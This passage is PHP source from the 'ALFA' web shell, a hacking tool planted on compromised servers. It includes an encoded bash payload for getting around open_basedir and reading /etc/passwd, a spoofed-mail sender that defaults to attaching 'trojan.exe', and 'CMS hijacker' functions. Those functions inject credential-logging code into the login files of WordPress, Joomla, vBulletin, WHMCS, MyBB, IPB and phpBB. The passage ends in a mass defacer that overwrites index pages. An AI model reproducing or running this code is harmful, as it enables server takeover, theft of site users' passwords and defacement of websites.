6998. stream_set_timeout($sock, 5);
6999. fwrite($sock, $packetContent . "\r\n\r\n\x00");
7000. $counter = 0;
7001. $maxtry = 1;
7002. $bin = "";
7003. do
7004. {
7005. $line = fgets($sock, 1024);
7006. if (trim($line) == "") $counter++;
7007. $bin .= $line;
7008. }
7009. while ($counter < $maxtry);
7010. fclose($sock);
7011. echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
7012. echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>";
7013. }
7014. flush();
7015. }
7016. }
7017. echo '</div>';
7018. alfafooter();
7019. }
7020. function alfacgihtaccess($m, $d = '', $symname = false)
7021. {
7022. $readme = "";
7023. if ($symname)
7024. {
7025. $readme = "\nReadmeName " . trim($symname);
7026. }
7027. if ($m == 'cgi')
7028. {
7029. $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
7030. }
7031. elseif ($m == 'sym')
7032. {
7033. $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
7034. }
7035. elseif ($m == 'shtml')
7036. {
7037. $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
7038. }
7039. @__write_file($d . '.htaccess', $code);
7040. }
7041. function alfabasedir()
7042. {
7043. alfahead();
7044. echo '<div class=header>
7045. <center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
7046. $passwd = _alfa_file('/etc/passwd');
7047. if (is_array($passwd))
7048. {
7049. $users = array();
7050. $makepwd = alfaMakePwd();
7051. $basedir = @ini_get('open_basedir');
7052. $safe_mode = @ini_get('safe_mode');
7053. if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode))
7054. {
7055. $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
7056. alfaWriteTocgiapi("basedir.alfa", $bash);
7057. $bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa " . $makepwd, false, true, true);
7058. $users = json_decode($bash_users, true);
7059. $x = count($users);
7060. if ($x >= 2)
7061. {
7062. array_pop($users);
7063. --$x;
7064. }
7065. }
7066. if (!$basedir && !$safe_mode)
7067. {
7068. $x = 0;
7069. foreach ($passwd as $str)
7070. {
7071. $pos = strpos($str, ':');
7072. $username = substr($str, 0, $pos);
7073. $dirz = str_replace("{user}", $username, $makepwd);
7074. if (($username != ''))
7075. {
7076. if (@is_readable($dirz))
7077. {
7078. array_push($users, $username);
7079. $x++;
7080. }
7081. }
7082. }
7083. }
7084. echo '<br><br>';
7085. echo "<b><font color=\"#00A220\">[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\n" . "<br /></font></b>";
7086. echo "<b><font color=\"#FFFFFF\">[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\n" . "<br /></font></b>";
7087. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n" . "<br /><br /><br /></font></b>";
7088. foreach ($users as $user)
7089. {
7090. if (empty($user)) continue;
7091. $path = str_replace("{user}", $user, $makepwd);
7092. echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
7093. }
7094. }
7095. else
7096. {
7097. echo ('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');
7098. }
7099. echo '<br><br></b>';
7100. echo '</div>';
7101. alfafooter();
7102. }
7103. function alfamail()
7104. {
7105. alfahead();
7106. echo '<div class=header>';
7107. echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
7108. $table = array(
7109. 'td1' => array(
7110. 'color' => 'FFFFFF',
7111. 'tdName' => 'Mail To : ',
7112. 'inputName' => 'mail_to',
7113. 'inputValue' => 'target@fbi.gov',
7114. 'inputSize' => '60',
7115. 'placeholder' => true
7116. ) ,
7117. 'td2' => array(
7118. 'color' => 'FFFFFF',
7119. 'tdName' => 'From : ',
7120. 'inputName' => 'mail_from',
7121. 'inputValue' => 'sec@google.com',
7122. 'inputSize' => '60',
7123. 'placeholder' => true
7124. ) ,
7125. 'td3' => array(
7126. 'color' => 'FFFFFF',
7127. 'tdName' => 'Subject : ',
7128. 'inputName' => 'mail_subject',
7129. 'inputValue' => 'your site hacked by me',
7130. 'inputSize' => '60'
7131. ) ,
7132. 'td4' => array(
7133. 'color' => 'FFFFFF',
7134. 'tdName' => 'Attach File : ',
7135. 'inputName' => 'mail_attach',
7136. 'inputValue' => $GLOBALS['cwd'] . 'trojan.exe',
7137. 'inputSize' => '60'
7138. ) ,
7139. 'td5' => array(
7140. 'color' => 'FFFFFF',
7141. 'tdName' => 'Count Mail : ',
7142. 'inputName' => 'count_mail',
7143. 'inputValue' => '1',
7144. 'inputSize' => '60'
7145. )
7146. );
7147. create_table($table);
7148. echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
7149. if (isset($_POST['alfa4']) && ($_POST['alfa4'] == '>>'))
7150. {
7151. $mail_to = $_POST['alfa1'];
7152. $mail_from = $_POST['alfa2'];
7153. $mail_subject = $_POST['alfa3'];
7154. $mail_content = $_POST['alfa5'];
7155. $count_mail = (int)$_POST['alfa6'];
7156. $mail_attach = $_POST['alfa7'];
7157. if (filter_var($mail_to, FILTER_VALIDATE_EMAIL))
7158. {
7159. if (!empty($mail_attach) && @is_file($mail_attach))
7160. {
7161. $file = $mail_attach;
7162. $content = __read_file($file);
7163. $content = chunk_split(__ZW5jb2Rlcg($content));
7164. $uid = md5(uniqid(time()));
7165. $filename = basename($file);
7166. $headers = "From: " . $mail_from . " <" . $mail_from . ">\r\n";
7167. $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
7168. $headers .= "Reply-To: " . $mail_from . "\r\n";
7169. $headers .= "Content-Type: multipart/mixed; boundary=\"" . $uid . "\"\r\n\r\n";
7170. $headers .= 'MIME-Version: 1.0' . "\r\n";
7171. $headers .= 'X-Mailer: php' . "\r\n";
7172. $mail_content = "--" . $uid . "\r\n";
7173. $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
7174. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
7175. $mail_content .= $mail_content . "\r\n\r\n";
7176. $mail_content .= "--" . $uid . "\r\n";
7177. $mail_content .= "Content-Type: application/octet-stream; name=\"" . $filename . "\"\r\n";
7178. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
7179. $mail_content .= "Content-Disposition: attachment; filename=\"" . $filename . "\"\r\n\r\n";
7180. $mail_content .= $content . "\r\n\r\n";
7181. $mail_content .= "--" . $uid . "--";
7182. }
7183. else
7184. {
7185. $headers = "From: " . $mail_from . " ( " . $mail_from . " ) \r\n";
7186. $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
7187. $headers .= 'Reply-To: ' . $mail_from . '' . "\r\n";
7188. $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
7189. $headers .= 'MIME-Version: 1.0' . "\r\n";
7190. $headers .= 'X-Mailer: php' . "\r\n";
7191. }
7192. if (empty($count_mail) || $count_mail < 1) $count_mail = 1;
7193. if (!empty($mail_from))
7194. {
7195. echo __pre();
7196. for ($i = 1;$i <= $count_mail;$i++)
7197. {
7198. if (@mail($mail_to, $mail_subject, $mail_content, $headers)) echo ("<center>Sent -> $mail_to<br></center>");
7199. }
7200. }
7201. else
7202. {
7203. __alert("Invalid Mail From !");
7204. }
7205. }
7206. else
7207. {
7208. __alert("Invalid Mail To !");
7209. }
7210. }
7211. echo ('</div>');
7212. alfafooter();
7213. }
7214. function alfaziper()
7215. {
7216. alfahead();
7217. echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
7218. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
7219. <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="' . htmlspecialchars($GLOBALS['cwd']) . '" size="60"/>
7220. <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . 'alfa.zip" size="60"/>
7221. <input type="submit" value=" " name="ziper" />
7222. </form></center></p>';
7223. if (isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>'))
7224. {
7225. $dirzip = $_POST['alfa3'];
7226. $zipfile = $_POST['alfa4'];
7227. if (class_exists('ZipArchive') && ($GLOBALS['sys'] != 'unix' || !_alfa_can_runCommand(true, true)))
7228. {
7229. $code = 'if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
7230. $newfunc = create_function('$source,$destination', $code);
7231. if ($newfunc($dirzip, $zipfile))
7232. {
7233. echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font></p></center>';
7234. }
7235. else
7236. {
7237. echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
7238. }
7239. }
7240. else
7241. {
7242. alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "' > /dev/null &");
7243. echo __pre() . '<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">' . $zipfile . '</font></b><br>Because We Executed The Command in The background !</p></center>';
7244. }
7245. }
7246. echo '</div>';
7247. alfafooter();
7248. }
7249. function alfacmshijacker()
7250. {
7251. alfahead();
7252. echo '<div class=header><br>
7253. <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
7254. <div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
7255. $cm_array = array(
7256. "vb" => "vBulletin",
7257. "wp" => "wordpress",
7258. "jom" => "joomla",
7259. "whmcs" => "whmcs",
7260. "mybb" => "mybb",
7261. "ipb" => "ipboard",
7262. "phpbb" => "phpbb"
7263. );
7264. foreach ($cm_array as $key => $val) echo '<option value="' . $key . '">' . $val . '</option>';
7265. echo ("</select>");
7266. echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
7267. SaveTo: <input size="50" type="text" name="saveto" value="' . $GLOBALS['cwd'] . 'alfa.txt"></font>
7268. <input type="submit" name="btn" value=" "></form></center><br>';
7269. $cms = $_POST['alfa1'];
7270. $saveto = $_POST['alfa2'];
7271. $cmspath = $_POST['alfa4'];
7272. if (!empty($cms) and !empty($saveto) and $_POST['alfa4'] and $_POST['alfa3'] == '>>')
7273. {
7274. echo __pre();
7275. alfaHijackCms($cms, $cmspath, $saveto);
7276. }
7277. echo '</div>';
7278. alfafooter();
7279. }
7280. function alfaHijackCms($cms, $cmspath, $saveto)
7281. {
7282. switch ($cms)
7283. {
7284. case "vb":
7285. hijackvBulletin($cmspath, $saveto);
7286. break;
7287. case "wp":
7288. hijackwp($cmspath, $saveto);
7289. break;
7290. case "jom":
7291. hijackJoomla($cmspath, $saveto);
7292. break;
7293. case "whmcs":
7294. hijackWhmcs($cmspath, $saveto);
7295. break;
7296. case "mybb":
7297. hijackMybb($cmspath, $saveto);
7298. break;
7299. case "ipb":
7300. hijackIPB($cmspath, $saveto);
7301. break;
7302. case "phpbb":
7303. hijackPHPBB($cmspath, $saveto);
7304. break;
7305. default:
7306. echo "error!";
7307. break;
7308. }
7309. }
7310. function hijackvBulletin($path, $saveto)
7311. {
7312. $code = '$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
7313. $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
7314. $code = str_replace('{saveto_path}', $saveto, $code);
7315. $login = $path . "/login.php";
7316. $class = $path . "/includes/class_bootstrap.php";
7317. $dologin = 'do_login_redirect();';
7318. $evil_login = "\t" . $code . "\n\t" . $dologin;
7319. $evil_class = "true";
7320. if (@is_file($login) and @is_writable($login) and @is_file($class) and @is_writable($class))
7321. {
7322. $data_login = @file_get_contents($login);
7323. $data_class = @file_get_contents($class);
7324. if (strstr($data_login, $dologin) and strstr($data_class, $clearpw))
7325. {
7326. $login_replace = str_replace($dologin, $evil_login, $data_login);
7327. $class_replace = str_replace($clearpw, $evil_class, $data_class);
7328. @file_put_contents($login, $login_replace);
7329. @file_put_contents($class, $class_replace);
7330. hijackOutput(0, $saveto);
7331. }
7332. else
7333. {
7334. hijackOutput(1);
7335. }
7336. }
7337. else
7338. {
7339. hijackOutput(1);
7340. }
7341. }
7342. function hijackwp($path, $saveto)
7343. {
7344. $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
7345. $redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
7346. $code = str_replace('{saveto_path}', $saveto, $code);
7347. $login = $path . "/wp-login.php";
7348. $evil_login = "\t" . $redirect_wp . "\n\t" . $code;
7349. if (@is_file($login) and @is_writable($login))
7350. {
7351. $data_login = @file_get_contents($login);
7352. if (strstr($data_login, $redirect_wp))
7353. {
7354. $login_replace = str_replace($redirect_wp, $evil_login, $data_login);
7355. @file_put_contents($login, $login_replace);
7356. hijackOutput(0, $saveto);
7357. }
7358. else
7359. {
7360. hijackOutput(1);
7361. }
7362. }
7363. else
7364. {
7365. hijackOutput(1);
7366. }
7367. }
7368. function hijackJoomla($path, $saveto)
7369. {
7370. $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
7371. $code = str_replace('{saveto_path}', $saveto, $code);
7372. $comp = $path . "/administrator/components/com_login/";
7373. if (@is_file($comp . "/login.php"))
7374. {
7375. $login = $comp . "/login.php";
7376. }
7377. elseif (@is_file($comp . "/admin.login.php"))
7378. {
7379. $login = $comp . "/admin.login.php";
7380. }
7381. else
7382. {
7383. $login = '';
7384. }
7385. if (@is_file($login) and @is_writable($login) and $login != '')
7386. {
7387. $data_login = @file_get_contents($login);
7388. $evil_login = $code . "\n" . $data_login;
7389. @file_put_contents($login, $evil_login);
7390. hijackOutput(0, $saveto);
7391. }
7392. else
7393. {
7394. hijackOutput(1);
7395. }
7396. }
7397. function hijackWhmcs($path, $saveto)
7398. {
7399. $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
7400. $code = str_replace('{saveto_path}', $saveto, $code);
7401. $conf = $path . "/configuration.php";
7402. if (@is_file($conf) and @is_writable($conf))
7403. {
7404. $data_conf = @file_get_contents($conf);
7405. if (!strstr($data_conf, '?>')) $code = '?>' . $code;
7406. $evil_conf = $data_conf . "\n" . $code;
7407. @file_put_contents($conf, $evil_conf);
7408. hijackOutput(0, $saveto);
7409. }
7410. else
7411. {
7412. hijackOutput(1);
7413. }
7414. }
7415. function hijackMybb($path, $saveto)
7416. {
7417. $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
7418. $find = '$loginhandler->complete_login();';
7419. $code = str_replace('{saveto_path}', $saveto, $code);
7420. $login = $path . "/member.php";
7421. $evil_login = "\t" . $code . "\n\t" . $find;
7422. if (@is_file($login) and @is_writable($login))
7423. {
7424. $data_login = @file_get_contents($login);
7425. if (strstr($data_login, $find))
7426. {
7427. $login_replace = str_replace($find, $evil_login, $data_login);
7428. @file_put_contents($login, $login_replace);
7429. hijackOutput(0, $saveto);
7430. }
7431. else
7432. {
7433. hijackOutput(1);
7434. }
7435. }
7436. else
7437. {
7438. hijackOutput(1);
7439. }
7440. }
7441. function hijackIPB($path, $saveto)
7442. {
7443. $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
7444. $find = 'unset( $member[\'plainPassword\'] );';
7445. $code = str_replace('{saveto_path}', $saveto, $code);
7446. $login = $path . "/admin/sources/handlers/han_login.php";
7447. $evil_login = "\t" . $find . "\n\t" . $code;
7448. if (@is_file($login) and @is_writable($login))
7449. {
7450. $data_login = @file_get_contents($login);
7451. if (strstr($data_login, $find))
7452. {
7453. $login_replace = str_replace($find, $evil_login, $data_login);
7454. @file_put_contents($login, $login_replace);
7455. hijackOutput(0, $saveto);
7456. }
7457. else
7458. {
7459. hijackOutput(1);
7460. }
7461. }
7462. else
7463. {
7464. hijackOutput(1);
7465. }
7466. }
7467. function hijackPHPBB($path, $saveto)
7468. {
7469. $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
7470. $find = 'case \'login\':';
7471. $code = str_replace('{saveto_path}', $saveto, $code);
7472. $login = $path . "/ucp.php";
7473. $evil_login = "\t" . $find . "\n\t" . $code;
7474. if (@is_file($login) and @is_writable($login))
7475. {
7476. $data_login = @file_get_contents($login);
7477. if (strstr($data_login, $find))
7478. {
7479. $login_replace = str_replace($find, $evil_login, $data_login);
7480. @file_put_contents($login, $login_replace);
7481. hijackOutput(0, $saveto);
7482. }
7483. else
7484. {
7485. hijackOutput(1);
7486. }
7487. }
7488. else
7489. {
7490. hijackOutput(1);
7491. }
7492. }
7493. function hijackOutput($c = 0, $p = '')
7494. {
7495. echo ($c == 0 ? "<center><font color='green'>Success</font> --> path: $p</center>" : '<center><font color="red">Error in inject code !</font></center>');
7496. }
7497. function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array())
7498. {
7499. if (@is_dir($dir))
7500. {
7501. $files = @scandir($dir);
7502. foreach ($files as $key => $value)
7503. {
7504. $path = @realpath($dir . DIRECTORY_SEPARATOR . $value);
7505. if (!@is_dir($path))
7506. {
7507. if ($ext != '*')
7508. {
7509. $f = basename($path);
7510. $f = explode('.', $f);
7511. $f = end($f);
7512. if ($f != $ext) continue;
7513. }
7514. if ($e == 'str')
7515. {
7516. $content = @file_get_contents($path);
7517. if (strpos($content, $string) !== false)
7518. {
7519. echo str_replace('\\', '/', $path) . "<br>";
7520. }
7521. }
7522. else
7523. {
7524. if (strstr($value, $string))
7525. {
7526. echo str_replace('\\', '/', $path) . "<br>";
7527. }
7528. }
7529. $results[] = $path;
7530. }
7531. elseif ($value != "." && $value != "..")
7532. {
7533. Alfa_StrSearcher($path, $string, $ext, $e, $results);
7534. $results[] = $path;
7535. }
7536. }
7537. }
7538. }
7539. function alfasearcher()
7540. {
7541. alfahead();
7542. echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
7543. if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'file')
7544. {
7545. echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
7546. <div class="txtfont">
7547. Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
7548. Dir: <input size="50" id="target" type="text" name="filename" value="' . $GLOBALS['cwd'] . '">
7549. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
7550. <input type="submit" name="btn" value=" "></div></form></center><br>';
7551. $dir = $_POST['alfa2'];
7552. $ext = $_POST['alfa3'];
7553. $method = $_POST['alfa4'];
7554. if ($_POST['alfa5'] == '>>')
7555. {
7556. echo __pre();
7557. if (substr($dir, -1) == '/') $dir = substr($dir, 0, -1);
7558. Alfa_Searcher($dir, trim($ext) , $method);
7559. }
7560. }
7561. if ($_POST['alfa1'] == 'str')
7562. {
7563. echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
7564. <div class="txtfont">
7565. Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
7566. String: <input type="text" name="string" value="">
7567. Dir: <input size="50" type="text" name="dir" value="' . $GLOBALS['cwd'] . '">
7568. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
7569. <input type="submit" name="btn" value=" "></div></form></center><br>';
7570. $dir = $_POST['alfa2'];
7571. $string = $_POST['alfa3'];
7572. $ext = $_POST['alfa5'];
7573. if (!empty($string) and !empty($dir) and $_POST['alfa4'] == '>>')
7574. {
7575. echo __pre();
7576. Alfa_StrSearcher($dir, $string, $ext, $_POST['alfa6']);
7577. }
7578. }
7579. echo '</div>';
7580. alfafooter();
7581. }
7582. function alfaMassDefacer()
7583. {
7584. alfahead();
7585. echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
7586. echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
7587. Mass dir: <input size="50" id="target" type="text" name="massdir" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
7588. DefPage: <input size="50" type="text" name="defpage" value="' . htmlspecialchars($GLOBALS['cwd']) . '"></div> <input type="submit" name="btn" value=" "></center></p>
7589. </form>';
7590. $dir = $_POST['alfa1'];
7591. $defpage = $_POST['alfa2'];
7592. $method = $_POST['alfa3'];
7593. $fCurrent = $GLOBALS['__file_path'];
7594. if ($_POST['alfa4'] == '>>')
7595. {
7596. if (!empty($dir))
7597. {
7598. if (@is_dir($dir))
7599. {
7600. if (@is_readable($dir))
7601. {
7602. if (@is_file($defpage))
7603. {
7604. if ($dh = @opendir($dir))
7605. {
7606. echo __pre();
7607. while (($file = @readdir($dh)) !== false)
7608. {
7609. if ($file == '..' || $file == '.') continue;
7610. $newfile = $dir . $file;
7611. if ($fCurrent == $newfile) continue;
7612. if (@is_dir($newfile))
7613. {
7614. Alfa_ReadDir($newfile, $method, $defpage);
7615. }
7616. else
7617. {
7618. if (!@is_writable($newfile)) continue;
7619. if (!@is_readable($newfile)) continue;
7620. Alfa_Rewriter($newfile, $file, $defpage, $method);
7621. }
7622. }
7623. closedir($dh);
7624. }
7625. else
7626. {
7627. __alert('<font color="red">Error In OpenDir...</font>');
7628. }
7629. }
7630. else
7631. {
7632. __alert('<font color="red">DefPage File NotFound...</font>');
7633. }
7634. }
7635. else
7636. {
7637. __alert('<font color="red">Directory is not Readable...</font>');
7638. }
7639. }
7640. else
7641. {
7642. __alert('<font color="red">Mass Dir is Invalid Dir...</font>');
7643. }
7644. }
7645. else
7646. {
7647. __alert('<font color="red">Dir is Empty...</font>');
7648. }
7649. }
7650. echo '</div>';
7651. alfafooter();
7652. }
7653. function Alfa_ReadDir($dir, $method = '', $defpage = '')
7654. {
7655. if (!@is_readable($dir)) return false;
7656. if (@is_dir($dir))
7657. {
7658. if ($dh = @opendir($dir))
7659. {
7660. while (($file = readdir($dh)) !== false)
7661. {
7662. if ($file == '..' || $file == '.') continue;
7663. $newfile = $dir . '/' . $file;
7664. if (@is_readable($newfile) && @is_dir($newfile)) Alfa_ReadDir($newfile, $method, $defpage);
7665. if (@is_file($newfile))
7666. {
7667. if (!@is_readable($newfile)) continue;
7668. Alfa_Rewriter($newfile, $file, $defpage, $method);
7669. }
7670. }
7671. closedir($dh);
7672. }
7673. }
7674. }
7675. function Alfa_Rewriter($dir, $file, $defpage, $m = 'index')
7676. {
7677. if (!@is_writable($dir)) return false;
7678. if (!@is_readable($dir)) return false;
7679. $defpage = @file_get_contents($defpage);
7680. if ($m == 'index')
7681. {
7682. $indexs = array(
7683. 'index.php',
7684. 'index.htm',
7685. 'index.html',
7686. 'default.asp',
7687. 'default.aspx',
7688. 'index.asp',
7689. 'index.aspx',
7690. 'index.js'
7691. );
7692. if (in_array(strtolower($file) , $indexs))
7693. {
7694. @file_put_contents($dir, $defpage);
